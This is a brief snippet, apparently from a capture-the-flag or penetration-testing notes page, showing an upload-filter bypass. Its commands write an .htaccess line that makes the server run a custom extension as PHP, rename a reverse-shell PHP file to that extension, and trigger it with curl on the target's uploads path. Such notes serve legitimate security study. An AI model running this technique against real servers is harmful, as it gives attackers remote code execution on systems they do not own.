.htaccess
# Create the .htaccess file
$ echo "AddType application/x-httpd-php .x7331" > .htaccess
# Rename the malicious file
$ cp revshell_ivan.php revshell_ivan.x7331
# Execute the file as a PHP script
$ curl http://access/uploads/revshell_ivan.x7331Last updated